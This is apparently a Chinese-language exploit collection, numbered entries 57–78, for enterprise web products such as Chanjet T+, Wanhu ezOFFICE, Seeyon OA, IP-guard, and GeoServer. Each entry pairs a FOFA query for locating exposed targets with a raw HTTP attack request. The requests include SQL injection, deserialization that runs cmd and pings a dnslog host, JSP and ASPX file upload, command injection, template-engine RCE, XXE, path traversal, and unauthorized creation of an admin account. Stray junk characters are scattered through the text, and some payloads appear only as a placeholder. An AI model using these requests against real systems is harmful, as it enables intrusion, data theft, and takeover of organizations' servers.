/ J* _9 ^( C3 Q9 ?; D' kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.369 h; {: L* |3 I9 S" i6 j+ |
Content-Type: application/json
0 O @4 E; z) L7 t
, J0 v+ J5 X6 c. y{" t) U+ ~7 e' r$ e6 P
"storeID":{* x. W0 M3 R8 ^" V
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
9 L4 d0 Z, z+ x "MethodName":"Start",5 u! l- E( `" D
"ObjectInstance":{2 k: b5 b$ X$ R- H% {- }5 h
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% A, T4 v2 h* I+ V' z7 ^
"StartInfo": {3 S7 }0 D2 z2 ^1 F3 s. c/ ?
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
8 P& V$ s1 P% \ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
3 S# W0 E9 }) j' P% a% H% [ }
% @! |1 T W; e0 s }
3 O$ R& B, D! p" H! Y }
; u' `$ T9 k- Z}' o3 q( b5 ^( ~! n- c) f
# f; q% R- R6 U) P; ?3 I* Z- A, h, y
% S) n) d4 ~& P+ Z- J) v
57. 畅捷通T+ keyEdit.aspx SQL注入
6 }7 N, b: J5 C- P. e* V3 D. jFOFA:app="畅捷通-TPlus"
. Y0 b% N8 g4 I8 K1 ~/ h) XGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.14 d1 w2 F, l+ M3 j
Host: host+ j2 h y& C$ g; A, q- E
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.364 {' P& }8 U9 |) A' s) D6 U% |8 g
Accept-Charset: utf-88 q7 W3 D6 r& e% ]) K8 X6 g& N% o
Accept-Encoding: gzip, deflate
2 ~& o0 }2 I; Z- T+ Q% R. l [% A! cConnection: close
5 @9 g$ B6 ?8 N) P) w1 W6 h4 y/ |
Y2 A. w* u" K' F1 p/ k, d1 D* P G$ T1 H
58. 畅捷通T+ KeyInfoList.aspx sql注入4 {9 e5 Y6 n% }
FOFA:app="畅捷通-TPlus"
) F, n/ f5 D$ t9 m9 v/ z+ {3 H; XGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1, G; U6 H' `# I/ V8 m6 C/ m
Host: your-ip5 n2 u# ~- \5 T
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
' Y. `1 M4 w p' E4 zAccept-Charset: utf-8; \$ t5 }( b" q% H B
Accept-Encoding: gzip, deflate
% D9 a& m8 z8 [. _/ A4 dConnection: close
1 p7 L0 N, a+ F: f' w& E: F% H! L0 Q6 X0 ^& @8 D5 P: x! B
; J& z$ `$ F8 I+ ` d6 f5 O
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 [4 V; b# f# |# WFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
6 G7 Y) w- i, z/ hPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1" H% ?0 }. C% q5 {( z
Host: 192.168.86.128:9090% F1 k% q& U, [2 X1 w
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ r7 N- i, [6 c2 aConnection: close- x$ h& C; f" p7 ~; e0 m0 U4 |
Content-Length: 1669: f2 |! y7 F4 d; B
Accept: */*5 P- r- J3 C: C$ T0 Q( C
Accept-Language: en! \% L1 S* D# s. [' H& j' E& ^
Content-Type: application/x-www-form-urlencoded9 O$ |+ K) E: Y0 ~
Accept-Encoding: gzip
& g& A/ I( ?0 \, |" m& d' X' i* h0 H5 ~2 w9 x; D0 [' S- O5 n
PAYLOAD
. G* y4 W1 X4 n, ^! t) ]1 E" r" \5 z) v" i* u8 w" o3 Z9 d& u6 I% P: X
; m+ v# ?8 g/ b: \
60. 百卓Smart管理平台 importexport.php SQL注入4 e% f8 ^' e9 b7 y# _
FOFA:title="Smart管理平台"9 U9 ^# p3 N# y" H$ j; ^3 _
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.14 {4 k/ z# @8 `
Host:7 {- C0 n8 |- L! A( Q& ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ a8 l: z4 D$ R+ `! }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ _4 p8 a+ b; x1 A: H$ y
Accept-Encoding: gzip, deflate3 J0 n! m o! w2 F9 u7 ^
Accept-Language: zh-CN,zh;q=0.9% y# N, i t [& y+ E
Connection: close
6 `' W6 B: s# X% B. V% l4 Q( \; T
' {$ u8 u% P8 z2 _; e4 O. T% M) D; t1 I) E. H
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! z5 m# C. m* |8 `3 z
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
8 J' m" d4 d" H6 c( bPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
, |4 `7 @! y) I+ r hHost: x.x.x.x. o O: o! k+ O; `1 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 j: J( T2 o$ L' [ ]
Connection: close; C, Y( R" g7 @ r0 z
Content-Length: 273 C* P# R6 G4 R! L3 ?& V: X
Accept: */*
5 X) Z2 z% Q& b. Z: o* B( VAccept-Encoding: gzip, deflate
% j2 B& ~ H; S7 g9 F9 a+ m/ z3 aAccept-Language: en$ n a8 h2 Q& K
Content-Type: application/x-www-form-urlencoded
. X% }( r3 d$ v) a2 U* U
4 [" L3 D& j! z8uxssX66eqrqtKObcVa0kid98xa6 P" S7 d$ g- c9 c( R
d, [: s$ n8 K" m1 {/ Q0 ]' W. N z- Y8 J4 ?
62. IP-guard WebServer 远程命令执行
8 A" J3 [/ E n5 G, y e5 P) ]FOFA:"IP-guard" && icon_hash="2030860561"5 _7 L1 f- s$ Y( ^/ u! D) j
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: I1 C) t* _$ { Z* HHost: x.x.x.x
$ n1 s: r) S& @5 B- XUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36% \; K) _5 L# W$ U0 {
Connection: close: z5 d# M: R! x. U$ S s
Accept: */*
+ Q+ x8 Z+ M" R+ JAccept-Language: en; O3 K ^" F( o6 K0 R
Accept-Encoding: gzip
" W# R7 y+ ]0 B! G7 _# b0 E7 u# `: J6 a, r' P$ ?5 v7 Q0 t
, {- a5 S; S6 a3 D访问0 S5 A' _, `3 g2 |& ]; A2 ]5 X
& f) C* z! x( a- ~GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.19 F9 d$ [$ D' C) l1 t
Host: x.x.x.x
1 P) ~0 w+ i; N* v. }( M4 S1 _! l+ f2 B$ D( O, l& [
6 d" Y/ f& e( E+ R% h8 c
63. IP-guard WebServer任意文件读取
; g$ W. }" M9 q) z/ x- N6 J3 t6 SIP-guard < 4.82.0609.0
l, x9 ]" q: eFOFA:icon_hash="2030860561"
9 y: q3 W4 s6 x7 y Y. r* }POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 t- w. J+ Y3 I; Z- O9 `7 rHost: your-ip# n: i, h; c; r; x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! C, P S% U: p, c. |+ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" i1 x% K) M9 p, p$ [
Accept-Encoding: gzip, deflate
. f4 d( i: V {- ~8 ?0 jAccept-Language: zh-CN,zh;q=0.90 A2 T1 b( Z& B: Z9 n* H% F9 v( q
Connection: close, g: R4 z6 n$ }; T) ]# u# o! b! p( k
Content-Type: application/x-www-form-urlencoded7 m% J8 |/ j, j A* z6 _* \
# d' F9 @7 h: y. u% v5 L& V# q
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ A2 A$ s" ?# y/ y, W' A1 ~2 N4 _! @5 I! U$ i
64. 捷诚管理信息系统CWSFinanceCommon SQL注入: C5 b) X( Q5 u3 [
FOFA:body="/Scripts/EnjoyMsg.js": d k e; D' b6 p
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.12 O1 x5 ^9 D/ B
Host: 192.168.86.128:9001
% g% r: |5 R+ K$ KUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
, f7 F. K! `) t4 R/ B; b" cConnection: close
4 ~/ m3 K1 X3 `9 C8 ?$ MContent-Length: 369
/ j x" k8 n6 p5 A6 K% l* VAccept: */*
6 c v( u2 t( BAccept-Language: en
2 h* T1 _6 k& }# e" e1 ?$ FContent-Type: text/xml; charset=utf-8
* z7 Z2 Q9 j3 l9 w j0 p9 _Accept-Encoding: gzip6 e V& q) v; x
. g. O" K+ t. v% |, V! o: e
<?xml version="1.0" encoding="utf-8"?>9 Z# H8 N# N" N: B! E9 E, r# f
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- h, D3 n: C7 p6 b6 J2 l
<soap:Body>. ?) V& m; W ^0 X7 O- O
<GetOSpById xmlns="http://tempuri.org/">! x0 e4 ? F- s3 S3 Q
<sId>1';waitfor delay '0:0:5'--+</sId>
" \" P& A& F4 d* Z9 G </GetOSpById>
+ e8 \. L. e- M6 O5 t </soap:Body>
( I! N ] [& c" Z5 O</soap:Envelope>4 Z! b* x+ K, e
' ^5 J/ l+ j; p$ f) y9 J- P
4 n7 L7 p- ?) S6 n/ G
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
; W l4 |+ s q3 H$ [FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"1 ]" |9 q( S9 F" {( z% C
响应200即成功创建账号test123456/123456
3 r2 I% Y0 |9 h+ m" qPOST /SystemMng.ashx HTTP/1.17 `6 N! u' Q( u
Host:: _9 k- q" ?% V/ _3 O$ Z/ Q
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)( k* X* @0 V& p( V) G9 I; y
Accept-Encoding: gzip, deflate
- v$ Z# g; y1 b" v+ h0 h1 dAccept: */*' h$ R* |2 S4 @- K( I
Connection: close
2 U! o9 c" Q- _) P; A: z+ s+ f' wAccept-Language: en' v4 L" v3 A! _) o
Content-Length: 174
" x% W- [3 C( F9 T& g8 k1 N0 V3 j: M) A5 B
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
5 H% g7 O4 p) _9 j& e1 K' {# ]( J' V/ S! W5 X" j6 \
( P& f5 n. A9 a; B: d3 D! k66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入' y# d( X$ [& ?* v& ~
FOFA:app="万户ezOFFICE协同管理平台"
5 k' z7 T/ q( g, P1 l. \2 o3 T" o8 a2 ^4 s E
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.18 }- ?" z* i: V7 I% r" e
Host: x.x.x.x5 b! Q! k7 l! X9 b: R; y1 Q5 p a! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& ]2 ~+ x! C/ `4 o, p# W) ?
Connection: close: B% M7 _' J4 N4 |
Accept: */*- J+ t: L6 B0 Q" f4 X7 y+ j$ T
Accept-Language: en F- e4 f: F T6 W4 j+ i0 q8 e" A
Accept-Encoding: gzip. C0 L6 |/ H$ f1 s, C+ H
6 f% j7 Y3 Z2 P6 N% D9 b t) ^& V4 q# G. r7 ^
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
- M% @ e7 _' ^( e/ w5 `7 I: `/ O1 r7 F: E, e3 ~0 b5 P6 W; o/ y* W
67. 万户ezOFFICE wpsservlet任意文件上传
3 I6 ^3 m& o, \; b6 u" r0 @+ f# ?FOFA:app="万户网络-ezOFFICE"& @7 O% c8 V6 e# `0 F* ]+ e. ?0 f
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
+ w+ j' {% n) n2 mPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1/ Y+ G4 Q6 Q! A: }0 J: L; f" l
Host: x.x.x.x t6 w. I# K# M$ s# \6 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
0 f$ L! l7 p2 G R2 J( C# GContent-Length: 173+ z. H+ s1 I, B+ h! e% D! U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
$ r5 _2 ^4 I0 IAccept-Encoding: gzip, deflate
$ v7 b6 `$ _% T% G: z+ GAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 d$ c6 L# ~1 }/ A& @8 E
Connection: close
/ I6 o+ d9 g, @( X9 `Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp# q2 A( Q% L3 O2 v( q$ I
DNT: 10 R5 Z2 a0 R1 `/ g" t
Upgrade-Insecure-Requests: 1' ]+ S9 ^( D8 ^( y$ ]7 ^0 B9 i! y P4 p
i- K1 ^, b3 _. Y
--ufuadpxathqvxfqnuyuqaozvseiueerp1 ~8 [9 V" \, W. q, n, A+ X
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"( x( B b# P% Y, X2 }; g
c2 l# u% U8 m<% out.print("sasdfghjkj");%>% t X1 \2 i/ p0 ^5 i. }
--ufuadpxathqvxfqnuyuqaozvseiueerp--& A% K4 s# B0 v" Q# x7 @
* D( F1 D ]+ q, \. |4 M4 R
5 X, J9 }- n S7 Z, c$ ]4 a' i6 N文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
7 _+ ^* C( f* Q# `1 q% a! `- L- t- g" c, G
68. 万户ezOFFICE wf_printnum.jsp SQL注入
* D" k2 b1 X" a% }! W' `& QFOFA:app="万户ezOFFICE协同管理平台"
" L$ z) u: P& a; d7 o+ PGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1! j9 [# @# D4 A9 Z
Host: {{host}}3 {9 P* N% Z1 K6 B- C) R5 N3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36( p( T" c1 M/ G$ |
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
. r: b% {* Q+ L& c/ S# w J. u: bAccept-Encoding: gzip, deflate
& ^* h' A9 Z4 `3 E( O9 [' kAccept-Language: zh-CN,zh;q=0.9, I! |2 w* ~% Z5 I4 Y! _1 ]; Z
Connection: close
* z4 G0 K; y" m/ T% }' a
# c7 b" w5 u- u/ T# t9 X* F5 p
% m. c' i& a$ l: h/ }- `69. 万户 ezOFFICE contract_gd.jsp SQL注入
1 Q; v- b* p& D; _FOFA:app="万户ezOFFICE协同管理平台"# ? X6 Y0 u0 H) y/ h
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
! d1 w- e, }2 X' x8 ?$ V: OHost: your-ip
# N' q# b. h0 {) r! L$ jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; A% k5 q) G% Y6 Z0 I: ~2 ?! C: ]0 s) sAccept-Encoding: gzip, deflate
6 L* e3 u; D4 |3 ~Accept: */*6 B k1 w* W; j
Connection: keep-alive# U" B* S* O9 Z$ T! i5 R& z
5 P* F+ l4 R+ _& l2 g! U+ N4 w# w
9 f3 r; x6 {6 F! T0 e
70. 万户ezEIP success 命令执行9 G6 B& c0 t# M% `) k: R8 T
FOFA:app="万户网络-ezEIP"! |) k# k7 t' A ~
POST /member/success.aspx HTTP/1.1
: `) Z, G1 E& dHost: {{Hostname}}) d1 N7 X; t9 F& Q/ J5 Y0 Z5 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& O: M/ N, }, _; ?( j: l* W G
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=# ^2 ^% U4 o( S: Q7 p
Content-Type: application/x-www-form-urlencoded$ Y# `$ `. g0 a5 {3 Y. v! K
TYPE: C3 {2 |$ _2 G5 P1 ?
Content-Length: 16702" Y' W( G: B& [8 Y7 l% B/ y4 \) X1 e
$ r$ ~ }9 S, w( Q# f& ]1 v' W__VIEWSTATE=PAYLOAD I; R2 l. P! {. k. {6 a" C- r4 ^! f
5 E4 U0 N0 S! v1 W: m5 v6 Y
& M( }3 N( F2 G! ]% X71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
6 k3 w5 u- M, G5 TFOFA:body="PM2项目管理系统BS版增强工具.zip"
+ ^/ `6 y/ D: Y9 D: NGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1: M! H" r1 c& b0 j; o' y) z
Host: x.x.x.xx.x.x.x# g: h* A: Y* _$ |. e; q) g
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 G# X2 m U( y4 sConnection: close
+ G- a3 x8 B- `/ e( ?8 V. G, x& MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* x) x0 S# J7 |' d1 O2 A
Accept-Encoding: gzip, deflate
X9 N( J2 ~. F9 A; ^4 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 e* I. f! l( U, F7 E2 {Upgrade-Insecure-Requests: 1
4 F0 p- t2 R8 N4 B( o
7 Y' Z- u; X! |9 A$ E) U+ Z' |' `
1 ~, i, @" W8 h: x, U( S1 }72. 致远OA getAjaxDataServlet XXE
" F6 A% {) {+ d( GFOFA:app="致远互联-OA"* o* v2 H! L @, a( |; g4 m6 Z
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1, P8 q1 Z+ ~ S2 L1 k/ F
Host: 192.168.40.131:8099' S# w6 W3 ?. d' x9 p+ r0 r" Y
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.366 f6 p: d E7 Z2 b+ V# @- t% ?
Connection: close
- \! `: X, A' ]% MContent-Length: 583+ g: K0 W. }/ U/ j5 e! u
Content-Type: application/x-www-form-urlencoded, T, |) L& y: @- C! s# L
Accept-Encoding: gzip
! C& Z; H+ r) L* O7 o/ @7 t. L
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
9 }" Y. D9 Y, A2 @
8 b6 o8 O1 P1 S* x" o! V- q$ r8 e" U G( F1 ]& l, g
73. GeoServer wms远程代码执行! m/ r6 \9 y% ^- [) p j$ t
FOFA:icon_hash=”97540678”
: ?( F- B8 R# @& S6 O6 M2 i, |POST /geoserver/wms HTTP/1.1
$ c$ d7 U. Q. H: K3 QHost:4 v* @# V: u9 O# ]) Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' {5 Q7 D( _# {; EContent-Length: 19816 k" b! |5 I4 X) ^/ R9 g3 v' E" w
Accept-Encoding: gzip, deflate: q: K% ]; V3 h" c2 [7 `" O
Connection: close3 _8 n" h5 }' j* n' S. P
Content-Type: application/xml
/ j2 ^( s4 S$ I3 `SL-CE-SUID: 3
+ q, ?0 M% [, D% T+ _: I, a# a- n$ Q3 F( j0 D+ Z! z
PAYLOAD
8 I0 ~ D! _4 j4 n
) L% E& n, A! I0 N1 a: i1 R- ]% F$ `0 [& m* f: L
74. 致远M3-server 6_1sp1 反序列化RCE
+ p+ _- ?& v1 ]" sFOFA:title="M3-Server"
6 N1 z! b" t. k( j q! s. P! jPAYLOAD. B6 s2 T' z$ \ `6 p3 o
, W, ~( M3 I9 g6 v/ {* N0 ]5 n! O. Y75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE6 d6 D) n: ]7 a, y. M
FOFA:app="TELESQUARE-TLR-2005KSH"4 `, i. \" f' s
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
& f3 x+ v" @" s& T% A1 i3 xHost: x.x.x.x% f. e9 S# o2 u! `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 p% w# f# [9 M: V) P" K
Connection: close' W8 S% ?6 Z) T A
Accept: */*9 E- m6 y& o' t
Accept-Language: en' Y C+ V6 N; {
Accept-Encoding: gzip
0 ~# Z: o" G+ I+ r7 l c) w& Z! M" \9 E7 i
6 b0 w9 S3 m4 ]& K/ Y+ Q8 I' A/ I
GET /cgi-bin/test28256.txt HTTP/1.1
* r0 t) |+ D o( }Host: x.x.x.x2 K3 N# d& n$ r5 S6 U& x
" L. b9 i" R8 [. x3 E2 Y
' F5 G6 ^2 c4 L76. 新开普掌上校园服务管理平台service.action远程命令执行: }7 e8 O+ A) Y) m
FOFA:title="掌上校园服务管理平台"
7 D; }1 ~" [! CPOST /service_transport/service.action HTTP/1.1 P( o% ^3 ]* J) G# p# e6 n; v/ F
Host: x.x.x.x& o& U, M8 A1 l0 Z0 t: u3 o& w) p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
" [- Y' T& I7 q Z5 P/ oConnection: close. R) U# `" V9 N" h' K% A# d+ f
Content-Length: 2113 p( D' ]( `! x- R& d4 R. e/ @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% e% R1 q6 M" T& J
Accept-Encoding: gzip, deflate1 T$ ?6 U+ b- w& }, J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 c$ h, `( c" `4 s
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
8 c; I) \! Y* U, L5 yUpgrade-Insecure-Requests: 14 Z5 u/ ~7 J6 \& E" m0 y3 I6 \
; m8 [5 I6 z6 X; ~{
: l7 n I" ?9 F- S7 S1 X* |"command": "GetFZinfo",
' Z, @/ F4 O" c/ W" } "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
H! G0 X, x$ N, n) _5 q! z7 y ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
$ v- @" _8 t/ K3 v$ ]}
- {4 c) p' m5 Z+ v' q" r( x1 P4 e4 I9 e3 Z$ c7 H9 v7 `7 q5 |+ N1 s ?3 k+ V
4 q& L- |3 d# k, q3 h DGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.15 q( F% T5 F( @; Q
Host: x.x.x.x
9 {. n& `0 H6 j; v) c
0 I: ^, r" J0 u* L5 w5 M
+ Y# T) m( j) B6 _! R/ t& i
, w. I% s9 I# r1 z n# a- S( \77. F22服装管理软件系统UploadHandler.ashx任意文件上传, B1 B) l+ B8 A8 g& n( E
FOFA:body="F22WEB登陆"% q' {, Q V) A/ n; T2 u* j) F3 Y
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( \$ X# A4 n) S# P2 j
Host: x.x.x.x1 e6 x: J# Z# c' k! I1 R9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 I/ j- \$ \: V' p; iConnection: close
+ S# {6 n& x6 P( y" e2 n' uContent-Length: 433
( V! B- I6 u) {% C! v: CAccept: */** G$ V! b1 ^) o% X' t/ Q" ?
Accept-Encoding: gzip, deflate) \: ~4 A, F/ L( w( d2 c, B6 z6 d: G6 i
Accept-Language: zh-CN,zh;q=0.9
9 x9 Q2 E% V5 ]6 K8 SContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
6 d8 G( i; Q1 @/ |, s4 e5 V: o$ n" ~- `/ Z0 t- N+ c' _
------------398jnjVTTlDVXHlE7yYnfwBoix- Y ?! k- [' T0 ^ l6 s5 c4 S# G
Content-Disposition: form-data; name="folder"
( H3 G) B$ c/ R& B
( B8 N+ A! @0 X4 J7 h4 w/upload/udplog; S' v |; H5 ^# l
------------398jnjVTTlDVXHlE7yYnfwBoix
& I; a, U Q* F% E; s4 gContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
% l3 L5 Z) ^" x$ r$ WContent-Type: application/octet-stream
& N7 t# D- a0 y/ Y$ e
( t5 z9 B( M X( b4 X3 _. yhello12345672 B9 V# ?5 Q2 Q% |+ z! H
------------398jnjVTTlDVXHlE7yYnfwBoix
7 L' ^# y: C) J: QContent-Disposition: form-data; name="Upload"
' m7 _5 }- K) S
9 ]& y2 a9 F- H# jSubmit Query
4 R& {, ]" U6 Q& @------------398jnjVTTlDVXHlE7yYnfwBoix--
8 l; d- M z# C9 G$ T( I f" o3 G; u( M
7 Y# d/ Q, ?4 H$ k. P2 }% a9 B
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
, d) N& S7 K1 }1 ZFOFA:icon_hash="2001627082"
0 Q' t) `- Y4 E# }* vPOST /Platform/System/FileUpload.ashx HTTP/1.1
3 q! Q6 x4 z8 l T' d+ ZHost: x.x.x.x
0 N" C, t2 j8 ~: X4 o8 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 K3 L3 l3 k; \1 a) h( b
Connection: close$ q4 k O7 o, ^+ K% f
Content-Length: 336. E! }8 I6 h! \" J
Accept-Encoding: gzip/ ^7 w) V& K) T* i, ?$ `3 _. Q
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 S3 X, h$ Z: v' s, A1 f( Z7 C
9 M$ K$ ?: j8 X) M$ _------YsOxWxSvj1KyZow1PTsh98fdu6l: b. C- P8 J# o3 X& s- `4 P
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
& P( c$ C3 K6 v& gContent-Type: image/png& k4 ?7 e8 L/ X; m
